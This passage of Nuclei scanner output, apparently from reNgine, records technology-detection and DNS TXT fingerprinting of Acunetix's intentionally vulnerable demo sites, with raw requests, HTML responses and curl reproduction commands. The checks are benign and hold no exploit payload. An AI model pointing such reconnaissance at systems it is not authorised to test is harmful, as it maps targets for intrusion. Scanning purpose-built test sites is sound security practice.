width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/h1\\u003e \\n \\u003ch6 id=\\\"siteInfo\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/h6\\u003e\\n \\u003cdiv id=\\\"globalNav\\\"\\u003e \\n \\t\\u003ctable border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\"\\u003e\\u003ctr\\u003e\\n\\t\\u003ctd align=\\\"left\\\"\\u003e\\n\\t\\t\\u003ca href=\\\"index.php\\\"\\u003ehome\\u003c/a\\u003e | \\u003ca href=\\\"categories.php\\\"\\u003ecategories\\u003c/a\\u003e | \\u003ca href=\\\"artists.php\\\"\\u003eartists\\n\\t\\t\\u003c/a\\u003e | \\u003ca href=\\\"disclaimer.php\\\"\\u003edisclaimer\\u003c/a\\u003e | \\u003ca href=\\\"cart.php\\\"\\u003eyour cart\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"guestbook.php\\\"\\u003eguestbook\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\n\\t\\u003c/td\\u003e\\n\\t\\u003ctd align=\\\"right\\\"\\u003e\\n\\t\\t\\u003c/td\\u003e\\n\\t\\u003c/tr\\u003e\\u003c/table\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\u003c!-- end masthead --\\u003e \\n\\n\\u003c!-- begin content --\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"content_rgn\\\" --\\u003e\\n\\u003cdiv id=\\\"content\\\"\\u003e\\n\\t\\u003ch2 id=\\\"pageName\\\"\\u003ewelcome to our page\\u003c/h2\\u003e\\n\\t \\u003cdiv class=\\\"story\\\"\\u003e\\n\\t\\t\\u003ch3\\u003eTest site for Acunetix WVS.\\u003c/h3\\u003e\\n\\t \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003c!--end content --\\u003e\\n\\n\\u003cdiv id=\\\"navBar\\\"\\u003e \\n \\u003cdiv id=\\\"search\\\"\\u003e \\n \\u003cform action=\\\"search.php?test=query\\\" method=\\\"post\\\"\\u003e \\n \\u003clabel\\u003esearch art\\u003c/label\\u003e \\n \\u003cinput name=\\\"searchFor\\\" type=\\\"text\\\" size=\\\"10\\\"\\u003e \\n \\u003cinput name=\\\"goButton\\\" type=\\\"submit\\\" value=\\\"go\\\"\\u003e \\n \\u003c/form\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"sectionLinks\\\"\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"categories.php\\\"\\u003eBrowse categories\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"artists.php\\\"\\u003eBrowse artists\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"cart.php\\\"\\u003eYour cart\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"login.php\\\"\\u003eSignup\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"userinfo.php\\\"\\u003eYour profile\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"guestbook.php\\\"\\u003eOur guestbook\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\u003cli\\u003e\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv class=\\\"relatedLinks\\\"\\u003e \\n \\u003ch3\\u003eLinks\\u003c/h3\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eSecurity art\\u003c/a\\u003e\\u003c/li\\u003e \\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\\\"\\u003ePHP scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\\\"\\u003ePHP vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"http://www.eclectasy.com/Fractal-Explorer/index.html\\\"\\u003eFractal Explorer\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"advert\\\"\\u003e \\n \\u003cp\\u003e\\n \\u003cobject classid=\\\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\\\" codebase=\\\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\n \\u003cparam name=\\\"movie\\\" value=\\\"Flash/add.swf\\\"\\u003e\\n \\u003cparam name=quality value=high\\u003e\\n \\u003cembed src=\\\"Flash/add.swf\\\" quality=high pluginspage=\\\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\\\" type=\\\"application/x-shockwave-flash\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\u003c/embed\\u003e\\n \\u003c/object\\u003e\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\n\\u003c!--end navbar --\\u003e \\n\\u003cdiv id=\\\"siteInfo\\\"\\u003e \\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eAbout Us\\u003c/a\\u003e | \\u003ca href=\\\"privacy.php\\\"\\u003ePrivacy Policy\\u003c/a\\u003e | \\u003ca href=\\\"mailto:wvs@acunetix.com\\\"\\u003eContact Us\\u003c/a\\u003e | \\u003ca href=\\\"/Mod_Rewrite_Shop/\\\"\\u003eShop\\u003c/a\\u003e | \\u003ca href=\\\"/hpp/\\\"\\u003eHTTP Parameter Pollution\\u003c/a\\u003e | \\u0026copy;2019\\n Acunetix Ltd \\n\\u003c/div\\u003e \\n \\n \\n\\u003cbr\\u003e \\n\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c/body\\u003e\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:47.454464435Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0' 'http://testphp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Root\",\"path\":\"/CVS/Root\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Root\",\"request\":\"GET /CVS/Root HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:34:47 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:47.59692856Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/CVS/Root'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"google-font-api\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/report\",\"path\":\"/report\",\"matched-at\":\"http://testhtml5.vulnweb.com/report\",\"request\":\"GET /report HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:122.0) Gecko/20100101 Firefox/122.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Your report was submitted, thanks. \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:47.878247926Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:122.0) Gecko/20100101 Firefox/122.0' 'http://testhtml5.vulnweb.com/report'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop\",\"path\":\"/Mod_Rewrite_Shop\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/\",\"request\":\"GET /Mod_Rewrite_Shop HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:31.0) Gecko/20100101 Firefox/31.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:47 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n\\t\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/1.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003eNetwork Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003ePrice\\u003cbr\\u003e359 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/2.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003eWeb Camera A4Tech PK-335E\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003ePrice\\u003cbr\\u003e10 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/3.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/color-printer/3/'\\u003eLaser Color Printer HP LaserJet M551dn, A4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/color-printer/3/'\\u003ePrice\\u003cbr\\u003e812 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003c/div\\u003e\\r\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:47.993415108Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:31.0) Gecko/20100101 Firefox/31.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 53467\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 53467\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3594\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:48.197753573Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 17673\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 17673\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3594\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:48.197972621Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 63414\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 63414\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3595\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:48.198533318Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 53665\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 53665\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER 